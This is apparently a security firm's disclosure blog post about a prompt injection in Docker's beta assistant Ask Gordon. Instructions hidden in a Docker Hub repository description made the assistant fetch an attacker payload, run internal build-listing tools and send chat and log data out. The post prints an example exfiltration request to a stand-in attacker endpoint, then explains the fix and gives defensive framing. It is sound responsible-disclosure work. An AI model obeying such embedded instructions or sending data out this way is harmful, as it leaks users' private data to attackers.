Blog
min read
.png)
Generative AI keeps expanding into every developer tool. Docker, one of the cornerstones of modern development, is no exception — and its new built-in assistant, Ask Gordon, is a prime example of that evolution.
While experimenting with Docker Desktop, we encountered this new beta feature that promised natural-language help right inside Docker Desktop and CLI. Naturally, that caught our attention.
What we discovered was a prompt injection vulnerability that enables attackers to hijack the assistant and exfiltrate sensitive data by poisoning Docker Hub repository metadata with malicious instructions.
By exploiting Gordon's inherent trust in Docker Hub content, threat actors can embed instructions that trigger automatic tool execution — fetching additional payloads from attacker-controlled servers, all without user consent or awareness.
What makes this attack particularly noteworthy: even if Docker had implemented domain allowlisting to restrict external requests, the attack would still succeed. The malicious instructions live inside Docker Hub itself — the platform's own official marketplace. This demonstrates a critical blind spot in AI security: when the injection payload resides in legitimate, trusted sources, traditional allowlisting defenses become ineffective.
Unlike typical prompt injection attacks that rely on obviously malicious external sources, this technique weaponizes the trust relationship between the AI assistant and its native ecosystem — turning Docker's own infrastructure into the attack vector.
We reported these findings to the Docker Security team, who moved quickly to address the vulnerability. This issue has now been fully resolved.

During the demo, we issued a normal request:
“Describe this Docker Hub repository.”
The assistant did what any helpful AI would; it fetched the repository metadata and returned a summary.
Except… it also fetched a hidden external payload, executed internal tool calls (fetch, list_builds, build_logs), and sent the results to an attacker-controlled server.
All of this happened automatically, without explicit user consent.
Our malicious input was deceptively simple - a short pointer placed inside a repository’s description field.
.png)
When the assistant read it, it obediently fetched the external resource and followed the new instructions inside.
Those instructions told it to:
list_builds and gather output.{DATA} payload.{DATA} in the query.The exploit chain completed in seconds.
The observed behavior maps directly to classic data exfiltration patterns described in MITRE ATT&CK — specifically Exfiltration Over Web Service and Automated Exfiltration (T1020). In practice, the agent acted as its own command-and-control client, encoding and sending sensitive data via standard HTTP requests.
Untrusted external content was incorporated into the assistant’s prompt pipeline without clear provenance or trust boundaries.
Once ingested, that content gained the same authority as internal system instructions - letting it call tools, process outputs, and trigger outbound requests.
This class of failure is recognized in the new LLM/agent context as CWE-1427 — Improper Neutralization of Input Used for LLM Prompting squarely applies.
Conceptually, this is a modern take on the classic injection vulnerability class described in the OWASP Top 10 - untrusted data is interpreted as executable instructions, altering the intended control flow of the system.
Severity: High / Critical (CVSS ≈ 8.6)
As you see below, the red highlighted tools invocation are attacker's controlled compromised tool calls.
.png)
GET https://attacker-endpoint.net?data=<url-encoded chat + tool outputs>
The lethal trifecta - why some systems are risky by design
Simon Willison recently framed a useful architecture-level warning in what he calls the lethal trifecta: when an agentic system simultaneously has (1) access to private data, (2) exposure to untrusted content, and (3) the ability to communicate externally, the platform is primed for misuse:
When these three conditions co-exist, small, well-placed inputs can escalate into full exfiltration chains. In Gordon’s case the trifecta was literal and actionable: the assistant had read access to sensitive local and cloud artifacts (build metadata, logs, chat history via tool wrappers like list_builds and build_logs), it routinely ingested untrusted external content (repo descriptions from Docker Hub and follow-up fetches to attacker URLs), and it could communicate outward (the fetch tool produced outbound HTTP requests and returned results to the model), all without a granular consent or provenance check. Those specific conditions collapsed trust boundaries in practice: a short pointer in a repo description became an instruction the agent would follow, the agent called internal tools on that instruction, and the resulting data was sent off to an attacker endpoint.
(See: Simon Willison — “The lethal trifecta for AI agents.”)
The CFS lens - why this payload worked
With that architectural context established, we analyze the attack using the Context, Format, Salience (CFS) framework. In practice, payloads that align with CFS are far more likely to succeed; the model therefore breaks an attack down into three diagnostic dimensions:
In the context of this attack:
“Context, Format, and Salience — three components that, when combined, make an indirect prompt injection far more likely to succeed.” - Pillar Security, CFS model (Anatomy of an Indirect Prompt Injection)
This incident gives the CFS framework real-world validation, and CFS isn’t just descriptive - It’s a predictive and diagnostic. By mapping each phase of the exploit to a CFS dimension, we could both explain why Gordon behaved the way it did and identify concrete intervention points that would have prevented the chain (for example: refusing to follow external URLs embedded in metadata, treating metadata as display-only, or requiring an explicit promotion flow before any tool calls).
CFS and the lethal trifecta complement each other: the trifecta explains why the environment is vulnerable by design, and CFS explains how the attack succeeds inside that environment. Together they form a practical lens for defenders — use the trifecta to locate architectural weak points, and apply CFS to design targeted mitigations and tests.
Following the responsible disclosure, Docker's security team engaged swiftly and implemented a mitigation.
The issue was resolved promptly, and the mitigation was released in Docker Desktop 4.50.0 on November 6th, 2025. Docker acknowledged the finding and expressed their gratitude for the responsible disclosure.
Crucially, the feature, Ask Gordon, was confirmed to be in a beta status at the time of the submission. While a formal CVE ID was not issued due to this pre-GA status, the rapid fix underscores a commitment to security even in early-stage feature development.
The core technical vulnerability was the agent's ability to execute the fetch tool autonomously based on untrusted external metadata. The mitigation introduced a simple but powerful control: Human-In-The-Loop (HITL) confirmation for all potentially sensitive or network-egressing tool calls.
Instead of automatically executing the malicious instruction embedded in the repository description, the updated agent now requires explicit user consent before proceeding:
.png)
This single control breaks the lethal trifecta by addressing two key weaknesses:
fetch) without explicit user review.This is a great example of a practical, high-leverage defense. By introducing a mandatory consent dialog before executing commands that involve network egress or access to sensitive local resources, the system successfully restores the necessary trust boundary between untrusted input and executable actions.
This incident demonstrates a broader truth: agentic assistants blur the line between “text interface” and “execution engine.”
When external data is treated as executable context, every metadata field becomes an attack surface.
By applying the methodology in the Agentic AI Red Teaming Playbook and the reasoning model from Anatomy of an Indirect Prompt Injection, we could predict — and prove — how this failure would occur.
Defenders should adopt the same structured mindset:
map agentic capabilities, test for CFS alignment, and gate tool access with explicit consent.
Until then, assume any assistant capable of fetching data can also fetch its own compromise.
Subscribe and get the latest security updates
Back to blog